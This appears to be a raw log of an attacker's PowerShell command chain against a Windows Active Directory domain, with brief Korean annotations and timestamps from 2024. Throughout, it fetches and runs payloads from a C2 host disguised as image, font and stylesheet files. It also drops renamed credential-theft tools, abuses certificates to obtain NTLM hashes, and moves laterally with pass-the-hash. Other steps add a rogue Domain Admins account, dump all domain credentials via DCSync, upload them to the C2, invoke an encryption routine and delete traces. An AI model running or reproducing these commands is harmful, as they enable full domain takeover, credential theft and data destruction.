2024-04-23 AM 5:52:56.575
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/bglayer.png>')
https://c2-conf.berylia.org/media/bglayer.png 다운로드 및 실행
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/css/bxslider.min.css>');
Invoke-Runas -LogonType 2 -Binary 'cmd.exe' -Password 'Red.Alert.58!' -Args '/c =' -User 'admnistrator';
Start-Sleep -Seconds 5;IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/mwfmdl2-v2.81.woff2>');
logo32, logo64 다운로드
"logo32.png", "logo64.png" | % {. ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString("<https://c2-conf.berylia.org/img/${_}>")))};
iwr -uri <https://c2-conf.berylia.org/js/jquery.min.js> -OutFile "C:\\Users\\Public\\Public Images\\rdpinit64.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
$domain = $env:USERDNSDOMAIN;
$dcfqdn = ($env:LOGONSERVER).split("\\\\")[2] + "." + $env:USERDNSDOMAIN;
$cred = New-Object System.Management.Automation.PSCredential("admnistrator", $("Red.Alert.58!" | ConvertTo-SecureString -AsPlainText -Force));
$hash_line = Invoke-CommandAs -ComputerName 127.0.0.1 -ScriptBlock {. "C:\\Users\\Public\\Public Images\\rdpinit64.exe" add /target:helpdesk.user /password:"123" /path:"C:\\Users\\Public\\Public Images\\cert.pfx"; . "C:\\Users\\Public\\Public Images\\pcaiu.exe" asktgt /user:helpdesk.user /certificate:"C:\\Users\\Public\\Public Images\\cert.pfx" /password:"123" /domain:$domain /dc:$dcfqdn /getcredentials /show} -AsSystem -Credential $cred | select-string NTLM;
$hash = $hash_line.Line.Split(":")[1].trim();
"tabler.min.css", "leaflet.css", "toastify.css", "widgets.css", "fusion.css" | % {. ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString("<https://c2-conf.berylia.org/css/${_}>")))};
Invoke-SMBExec -Target $dcfqdn -Domain $domain -Username helpdesk.user -Hash $hash -Command "powershell.exe -exec bypass -c IEX (New-Object Net.Webclient).downloadstring('<https://c2-conf.berylia.org/media/footer-social.png>');" -Verbose;
Start-Sleep -Seconds 5;
-----------------------------------------------------
New-ADUser -AccountPassword $(ConvertTo-SecureString 'TFighterX022024!' -AsPlainText -Force) -SamAccountName 'automation.user' -Name 'automation.user' -Enabled ${TRuE};
Add-ADGroupMember -Identity 'Domain Admins' -Members 'automation.user';
logo32.png
logo64.png
2024-04-23 AM 5:53:03.443
mkdir "C:\\Users\\Public\\Public Images";
iwr -uri <https://c2-conf.berylia.org/upload/img/background.png> -OutFile "C:\\Users\\Public\\Public Images\\Document.doc" -useb;
Start-Process "C:\\Users\\Public\\Public Images\\Document.doc";
Start-Sleep -Seconds 15;
Get-Process | ?{$_.ProcessName -eq "WINWORD"} | Stop-Process -Force;
Start-Sleep -Seconds 5;
Start-Process -FilePath cmd.exe -ArgumentList
"/c powershell.exe -exec bypass -c cd 'c:\\Users\\Public\\Public Images\\'; IEX (New-Object Net.Webclient).downloadstring('<https://c2-conf.berylia.org/media/profile.png>');"
Document.doc 다운로드 및 실행
profile.png 다운로드 및 실행
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/css/bxslider.min.css>');
Invoke-Runas -LogonType 2 -Binary 'cmd.exe' -Password 'Red.Alert.58!' -Args '/c =' -User 'admnistrator';
Start-Sleep -Seconds 5;IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/mwfmdl2-v2.81.woff2>');
mwfmdl2-v2.81.woff2
iwr -uri <https://c2-conf.berylia.org/js/chunk4867.min.js> -OutFile "C:\\Users\\Public\\Public Images\\sdiaghost.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/sigma.js> -OutFile "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
$domain = $env:USERDNSDOMAIN;
$parent_domain = ($domain -split "\\." | Select-Object -Skip 1) -join ".";
$parent_dc_fqdn = "dc01-conf." + $parent_domain;
$url = "<http://ca01-conf>." + $parent_domain + "/";
$dc_ip = "10." + $domain.Split(".")[4] + ".32.11";
$ws_ip = "10." + $domain.Split(".")[4] + ".32.14";
$hash_line = $null
do {
$command = ". 'C:\\Users\\Public\\Public Images\\sdiaghost.exe' relay -target $url -template DomainController -out 'C:\\Users\\Public\\Public Images\\dc01-conf'";
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));
Start-Process -NoNewWindow -FilePath powershell.exe -ArgumentList "-e $encoded"
sleep 2;
for ($i = 0; $i -lt 10; $i++) {
. "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" $dc_ip $ws_ip
sleep $i;
}
$hash_line = . "C:\\Users\\Public\\Public Images\\sdiaghost.exe" auth -pfx "C:\\Users\\Public\\Public Images\\dc01-conf.pfx" -dc-ip $dc_ip | Select-String "aad3b435b51404eeaad3b435b51404ee";
sleep 2;
} while ([string]::IsNullOrEmpty($hash_line))
$hash_line = $hash_line.Line.Split(":")[-1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:dc01-conf$ /domain:$parent_domain /rc4:$hash_line /ptt;
Get-ChildItem -Path "C:\\Users\\Public\\Public Images\\" | Remove-Item -Force;
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;
Invoke-Command -ComputerName $parent_dc_fqdn -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/fa-solid-900.woff>")}
fa-solid-900.woff
mkdir "C:\\Users\\Public\\Public Images";
IEX (iwr '<https://c2-conf.berylia.org/css/style.css>');
Encrypt-Data;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/css/onepick.css> -OutFile "C:\\Users\\Public\\Public Images\\wausevr.exe" -useb;
IEX (iwr '<https://c2-conf.berylia.org/css/bootstrap.min.css>');
$domain = $env:USERDNSDOMAIN;
$user = "administrator@" + $domain;
$ca = "ca01-conf." + $domain;
. 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /domain:$domain /all /csv" "exit" > "C:\\Users\\Public\\Public Images\\file.txt";
$filename = "credentials-" + $domain.Split(".")[3];
Upload-File -UploadUrl "<https://c2-conf.berylia.org/fileupload.php>" -FilePath "C:\\Users\\Public\\Public Images\\file.txt" -FileName $filename;
$hash_data = . 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /user:$user /domain:$domain" "exit" | sls "Hash NTLM" | Out-String;
$hash = $hash_data.Split(":")[1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:administrator /rc4:$hash /ptt;
Invoke-Command -ComputerName $ca -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/goog-ads.jpg>")};
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;mm